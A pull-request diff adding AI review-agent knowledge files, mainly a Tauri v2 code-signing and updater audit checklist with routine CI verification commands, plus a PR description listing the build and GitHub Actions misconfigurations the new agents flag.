+For end-user impact, the **installer download size** matters more than the binary size — a small Rust binary inside a `fixedRuntime` WebView2 install (~180 MB) ships as a ~180 MB installer. Track both. CI checks like `node scripts/check-bundle-size.mjs` SHOULD assert against the installer size for shipped artefacts and the binary size for the in-process budget.
+
+### `size-watch-dependency-bumps`
+
+Cargo dependency bumps are the most common silent size regression. A bump from `serde 1.0.x` to `1.0.y` rarely matters; a bump from `tauri 2.0` to `2.1` can move 1-2 MB. Track binary size in CI per-PR with a regression threshold (e.g. ±5%).

--- a/.claude/agents/tauri-build-expert/knowledge/tauri-signing-and-updater.md
+++ b/.claude/agents/tauri-build-expert/knowledge/tauri-signing-and-updater.md
@@ -1,0 +1,227 @@
+---
+tags: [signing, updater, tauri-v2, build-system]
+source: Tauri v2 official documentation (https://v2.tauri.app/), summarised
+---
+
+# Tauri v2 Code Signing & Updater
+
+Project-agnostic audit checklist for code-signing and the `tauri-plugin-updater` distribution chain. Cite a rule by its `<rule-id>`.
+
+> **Scope:** per-platform code-signing config (`bundle.macOS`, `bundle.windows`), notarization, the `plugins.updater.pubkey` / `endpoints` / `latest.json` triangle, signature artefacts (`.sig`), install modes. Network-level CSP, IPC bounds, and renderer XSS posture are out of scope (see `tauri-security-expert`).
+>
+> **References:** [Sign macOS](https://v2.tauri.app/distribute/sign/macos/), [Sign Windows](https://v2.tauri.app/distribute/sign/windows/), [Updater](https://v2.tauri.app/plugin/updater/), [DMG distribution](https://v2.tauri.app/distribute/dmg/), [macOS App Bundle](https://v2.tauri.app/distribute/macos-application-bundle/).
+
+## macOS signing — `sign-mac-*`
+
+### `sign-mac-identity-explicit`
+
+`bundle.macOS.signingIdentity` is the canonical knob. Three valid values:
+
+| Value | When to use |
+|---|---|
+| `"-"` | Ad-hoc signature. App launches on Apple Silicon when users clear `com.apple.quarantine`. Acceptable for OSS apps that don't pay for a Developer ID. |
+| `"Developer ID Application: Name (TEAMID)"` | Full Developer ID — required for Gatekeeper-without-quarantine and for notarization. |
+| `null` / unset | Falls back to `APPLE_SIGNING_IDENTITY` env var. Acceptable in CI, **never** in committed config without a documented env-var contract. |
+
+A blank/null identity *and* missing env var produces an unsigned `.app`. macOS refuses to launch it on first download with a generic "is damaged and can't be opened" dialog — no actionable diagnostic, no log line. CI MUST verify post-build.
+
+### `sign-mac-verify-in-ci`
+
+Every macOS release pipeline MUST run a verification step after `tauri build`:
+
+```sh
+codesign -dv --verbose=4 "<path>.app" 2>&1 | grep -E 'Signature=adhoc|Authority='
+codesign -dv --verbose=4 "<path>.app/Contents/MacOS/<embedded-binary>" 2>&1 | grep -E 'Signature=adhoc|Authority='
+```
+
+Embedded sidecar binaries must be signed with the **same** posture as the outer bundle — Gatekeeper rejects an ad-hoc bundle whose embedded CLI is not also ad-hoc, and rejects a Developer-ID bundle whose embedded binary is unsigned.
+
+### `sign-mac-keychain-import-in-ci`
+
+Importing the Developer ID `.p12` certificate in CI requires four secrets: `APPLE_CERTIFICATE` (base64 of the .p12), `APPLE_CERTIFICATE_PASSWORD`, `KEYCHAIN_PASSWORD`, and the resolved `APPLE_SIGNING_IDENTITY`. The canonical sequence is:
+
+```sh
+echo "$APPLE_CERTIFICATE" | base64 --decode > certificate.p12
+security create-keychain -p "$KEYCHAIN_PASSWORD" build.keychain
+security default-keychain -s build.keychain
+security unlock-keychain -p "$KEYCHAIN_PASSWORD" build.keychain
+security set-keychain-settings -t 3600 -u build.keychain
+security import certificate.p12 -k build.keychain -P "$APPLE_CERTIFICATE_PASSWORD" -T /usr/bin/codesign
+security set-key-partition-list -S apple-tool:,apple:,codesign: -s -k "$KEYCHAIN_PASSWORD" build.keychain
+```
+
+The `set-key-partition-list` step is **mandatory** on macOS 10.12+ — without it `codesign` prompts for the keychain password, which hangs CI silently. Pin the keychain timeout (`-t 3600`) to bound the credential lifetime.
+
+### `sign-mac-notarize-when-distributing`
+
+For Developer ID distribution outside the App Store, signing is necessary but not sufficient — the bundle MUST be notarized with `xcrun notarytool` and stapled with `xcrun stapler staple`. Tauri delegates notarization to env vars:
+
+- App Store Connect API: `APPLE_API_ISSUER`, `APPLE_API_KEY`, `APPLE_API_KEY_PATH` (preferred — no 2FA flakiness).
+- Apple ID: `APPLE_ID`, `APPLE_PASSWORD` (app-specific password), `APPLE_TEAM_ID`.
+
+Skipping notarization ships a Developer-ID-signed app that triggers Gatekeeper "developer cannot be verified" on first launch — confusing for end users and indistinguishable from a malware warning. If the project deliberately ships ad-hoc instead of notarized, the README/install docs MUST document the `xattr -dr com.apple.quarantine` workaround.
+
+### `sign-mac-hardened-runtime-with-developer-id`
+
+Notarization REQUIRES `bundle.macOS.hardenedRuntime: true` (the Tauri default). Disabling it produces a Developer-ID-signed bundle that notarization rejects. Only flip to `false` for unsigned local debug builds.
+
+## Windows signing — `sign-win-*`
+
+### `sign-win-thumbprint-canonical`
+
+Tauri-native Windows signing uses three keys in `bundle.windows`:
+
+```json
+{
+  "certificateThumbprint": "A1B1A2B2A3B3A4B4A5B5A6B6A7B7A8B8A9B9A0B0",
+  "digestAlgorithm": "sha256",
+  "timestampUrl": "http://timestamp.digicert.com"
+}
+```
+
+The thumbprint is a hex string from the cert's "Thumbprint" detail field — **no spaces, no colons, no leading `0x`**. A space-separated form (Windows certmgr displays it that way) compiles but `signtool` rejects it at runtime.
+
+### `sign-win-digest-sha256-only`
+
+`digestAlgorithm` MUST be `"sha256"` for any cert issued in 2017 or later. SHA-1 was deprecated by Microsoft for code-signing in 2016; many timestamp servers refuse it. SHA-256 is the only correct choice.
+
+### `sign-win-timestamp-url-required`
+
+`timestampUrl` is **mandatory** for production releases. Without it, the signature stops being valid the day the certificate expires — even on already-installed copies of the app, SmartScreen will start warning. With a timestamp, signatures remain valid past cert expiry. Pick a timestamp server from the cert issuer's documentation; the `tsp: true` flag enables RFC 3161 timestamping for cross-vendor compatibility.
+
+### `sign-win-azure-key-vault-via-sign-command`
+
+Cloud HSM signing (Azure Key Vault, AWS KMS, EV cert with hardware token) cannot use the thumbprint flow. Instead, set `bundle.windows.signCommand` to a custom command:
+
+```json
+{
+  "signCommand": "azuresigntool sign -kvu %1 -kvi %2 -kvs %3 -kvc %4 -tr %5 -td sha256 %f"
+}
+```
+
+`%f` is substituted with the file to sign. `signCommand` overrides the thumbprint flow entirely; setting both is a configuration error — flag it.
+
+### `sign-win-fips-flag`
+
+If the host repo's compliance posture requires FIPS-validated MSI bundles, set `TAURI_BUNDLER_WIX_FIPS_COMPLIANT=true` in the build environment. This is a build-environment flag, not a config key — it has to be present at the `tauri build` step.
+
+## Updater — `updater-*`
+
+### `updater-key-pair-generation`
+
+The Tauri updater requires a minisign keypair generated by `tauri signer generate -w <path>`. The pair has two halves with strict roles:
+
+- **Public key** — embedded in `plugins.updater.pubkey`. Safe to commit; safe to ship.
+- **Private key** — used at build time to sign update bundles. Set via `TAURI_SIGNING_PRIVATE_KEY` (path or content) and optionally `TAURI_SIGNING_PRIVATE_KEY_PASSWORD`. **NEVER commit. Never log.** A leaked private key forces a coordinated public-key rotation and breaks every existing install's update path.
+
+### `updater-pubkey-content-not-path`
+
+`plugins.updater.pubkey` MUST be the *content* of the public key (a base64 string after the `untrusted comment:` line — Tauri accepts either the raw base64 or the full file contents). Setting it to a file path (`"./pubkey.pem"`) compiles but fails at runtime with a parse error on the first update check. Embed the value verbatim.
+
+### `updater-endpoints-https-only`
+
+`plugins.updater.endpoints` MUST be HTTPS in production. Tauri enforces TLS in release builds; the `dangerousInsecureTransportProtocol: true` escape hatch is for local testing only. If a workflow templates an endpoint from a variable, validate the HTTPS prefix at build time.
+
+### `updater-endpoint-templating`
+
+Endpoint URLs may interpolate `{{current_version}}`, `{{target}}` (`linux`/`windows`/`darwin`), and `{{arch}}` (`x86_64`/`i686`/`aarch64`/`armv7`). Use these to pin a static manifest per-platform — server-side dynamic versioning is rarely worth the complexity for a viewer/CLI app. Multiple endpoints fall through on non-2xx; the order matters.
+
+### `updater-create-artifacts-flag`
+
+`bundle.createUpdaterArtifacts` MUST be `true` (or `"v1Compatible"` during migration). With the flag off, `tauri build` does not emit `.sig` files. Symptoms when missing:
+
+- The published `latest.json` references signatures that don't exist.
+- Every client hits "signature verification failed" on update check.
+- The release CI's `gh release upload ... .sig` step finds no files and silently skips (or fails, depending on the script).
+
+The `"v1Compatible"` value is **temporary** — it is removed in v3, so leave a `// TODO migrate to true` only when v1 clients are still in the field.
+
+### `updater-artifacts-per-platform`
+
+The artefacts produced by an updater-enabled build are platform-specific:
+
+| Platform | Updater artefact | Signature file | Notes |
+|---|---|---|---|
+| Linux | `myapp.AppImage` | `myapp.AppImage.sig` | The standard AppImage doubles as the updater bundle. |
+| macOS | `myapp.app.tar.gz` | `myapp.app.tar.gz.sig` | The DMG is **not** the updater bundle — clients download the tar.gz and replace the `.app` in place. |
+| Windows | `myapp-setup.exe` *or* `myapp.msi` | `*.sig` | The installer doubles as the updater bundle; the `installMode` config controls install behaviour. |
+
+Shipping a release that publishes only the DMG (no `.app.tar.gz`) breaks macOS auto-updates silently — clients see "no update available". Verify all three platform artefacts are present before publishing the manifest.
+
+### `updater-manifest-schema`
+
+The static manifest (`latest.json` or equivalent) follows a strict schema:
+
+```json
+{
+  "version": "1.2.3",
+  "notes": "...",
+  "pub_date": "2026-01-01T00:00:00Z",
+  "platforms": {
+    "windows-x86_64":  { "signature": "...", "url": "..." },
+    "windows-aarch64": { "signature": "...", "url": "..." },
+    "darwin-aarch64":  { "signature": "...", "url": "..." },
+    "darwin-x86_64":   { "signature": "...", "url": "..." },
+    "linux-x86_64":    { "signature": "...", "url": "..." }
+  }
+}
+```
+
+Required: `version`, every shipped `platforms[].url`, every shipped `platforms[].signature`. Optional: `notes`, `pub_date` (RFC 3339). The `signature` MUST be the *content* of the `.sig` file (the base64 line after `untrusted comment:`), not a URL. Tauri validates **the whole manifest** before checking version — a malformed entry for one platform breaks updates on *all* platforms.
+
+### `updater-platform-keys-naming`
+
+Platform keys are `<os>-<arch>` where `os ∈ {linux, darwin, windows}` and `arch ∈ {x86_64, i686, aarch64, armv7}`. Common mistakes:
+
+- `"macos-arm64"` — wrong (use `darwin-aarch64`).
+- `"windows-arm64"` — wrong (use `windows-aarch64`).
+- `"darwin-arm64"` — wrong (use `darwin-aarch64`).
+- `"linux-x64"` — wrong (use `linux-x86_64`).
+
+A typo silently makes that platform invisible to the updater (clients see "no update available"). The matching is exact.
+
+### `updater-windows-install-mode`
+
+`plugins.updater.windows.installMode` is one of:
+
+- `"passive"` (default) — small progress window, no user interaction. Generally recommended.
+- `"basicUi"` — full installer UI, requires user clicks.
+- `"quiet"` — no UI; works only when the app already runs as admin or is a per-user install. Generally avoid.
+
+A mismatch between `bundle.windows.nsis.installMode` and `plugins.updater.windows.installMode` is OK — they serve different phases — but a `quiet` updater paired with a `perMachine` install fails silently when the user lacks admin.
+
+### `updater-private-key-env-not-dotenv`
+
+`TAURI_SIGNING_PRIVATE_KEY` MUST be set as a real environment variable, not via a `.env` file. Tauri's loader explicitly does **not** read dotenv files for signing keys (this is documented). A `.env`-only setup produces unsigned bundles in CI with no clear error.
+
+### `updater-build-time-and-publish-time-coherent`
+
+The `.sig` file generated by `tauri build` is regenerated on every build — it is not deterministic. A pipeline that builds artefacts in one job and publishes the manifest from a different job MUST upload the `.sig` files alongside the artefacts and read them back when generating the manifest (canonical pattern: download the `.sig` from the release before constructing `latest.json`). Computing the manifest from a stale `.sig` produces a verification failure on every client.
+
+### `updater-pre-flight-asset-presence`
+
+Before publishing the updater manifest, verify that *every* updater asset exists in the release. Canonical assertion (one per platform):
+
+```sh
+gh release view "$TAG" --json assets --jq ".assets[].name" | grep -q "^${ASSET_NAME}\$"
+```
+
+Skipping the assertion ships a manifest that points to non-existent URLs. Clients see "Failed to download update" with no path forward.
+
+## DMG / installer-window — `dmg-*`
+
+### `dmg-applications-symlink-required`
+
+A DMG distribution flow MUST verify the Applications symlink exists in the mounted DMG. The standard Tauri DMG layout puts the `.app` and an `Applications →` symlink side-by-side; an absent symlink ships a DMG where users cannot drag-install. CI verification:
+
+```sh
+hdiutil attach -nobrowse -readonly "<path>.dmg"
+[ -L "/Volumes/<name>/Applications" ] || exit 1
+hdiutil detach "/Volumes/<name>" -force
+```
+
+Tauri's `bundle_dmg.sh` is known to flake (tauri-apps/tauri#3055) — wrap the build in a 2-attempt retry that detaches stale mounts and removes half-written DMGs between attempts.
+
+### `dmg-background-windowsize-coherent`
+
+If `bundle.macOS.dmg.background` is set, `bundle.macOS.dmg.windowSize` MUST be sized to match the background image. A 1024×640 background with the default 660×400 window crops the image. The default appPosition `(180, 170)` and applicationFolderPosition `(480, 170)` are calibrated for the 660×400 default — recalibrate when changing windowSize.


### PR DESCRIPTION
Adds two new portable review agents covering territory the existing experts don't cover.

## tauri-build-expert

Reviews the **build/distribute** path  separate from 	auri-coding-expert (runtime API correctness) and 	auri-architect-expert (component boundaries). Catches:

- `bundle.externalBin` paths drifting from the matrix's target triples (silent build aborts)
- `tauri.conf.json > version` skewing against `Cargo.toml > [package].version`
- `createUpdaterArtifacts` off while `plugins.updater.endpoints` is configured (every client fails verification silently)
- Missing `signingIdentity` on macOS (gatekeeper rejects with no diagnostic)
- `downloadBootstrapper` shipped to offline environments
- Missing `hardenedRuntime` blocking notarization
- `removeUnusedCommands: true` silently stripping commands that lack capability ACL coverage
- Cargo release profile missing `lto`, `strip`, `panic = abort`, `codegen-units = 1`

knowledge_tags: `build-system, signing, updater, bundle, tauri-v2`  
project_docs: `architecture, security, features`

## github-actions-expert

Reviews **CI/CD workflows**. Catches:

- Third-party actions pinned to tags/branches instead of full-length commit SHAs
- Missing or over-broad workflow-level `permissions:` block
- `pull_request_target` + `actions/checkout` of PR head SHA (the canonical "pwn request")
- Untrusted `github.event.*` interpolated into `run:` scripts without env-var indirection
- Concurrency groups missing `cancel-in-progress` or, conversely, set to `true` on production deploys
- Cache keys missing OS or lock-file hash
- Missing `timeout-minutes` (defaults to 6 hours)
- Missing aggregate gate jobs that branch protection depends on
- Long-lived cloud secrets where OIDC token exchange would work

knowledge_tags: `gha, cicd, security, secrets`  
project_docs: `features`

## Repo-agnostic contract upheld

Both agent `agent.md` bodies never reference any project-specific path. Project knowledge loads via:

- `project_docs:` frontmatter  `Agent project-doc manifest` table in the host repo's `AGENTS.md`
- `knowledge_tags:` frontmatter  tag overlap with `docs/best-practices-project/*.md`

Either or both can be absent  the agent runs with bundled knowledge only.

## Sources

- Tauri v2 official docs: `v2.tauri.app/distribute/`, `/develop/sidecar/`, `/plugin/updater/`, `/security/capabilities/`, `/concept/size/`, `/reference/config/`
- GitHub Actions security guides: `docs.github.com/en/actions/security-for-github-actions/`
- GitHub Security Lab: "Preventing pwn requests" research series
- Cargo Reference: profile settings

## What changed

- `.claude/agents/tauri-build-expert/`  agent.md + 3 knowledge files (build config, signing/updater, bundle size)
- `.claude/agents/github-actions-expert/`  agent.md + 2 knowledge files (security hardening, workflow design)
- `.claude/agents/README.md`  added 6 new tag rows (`build-system`, `signing`, `updater`, `gha`, `cicd`, `secrets`) and the two new agent table rows

8 files changed, 1318 insertions.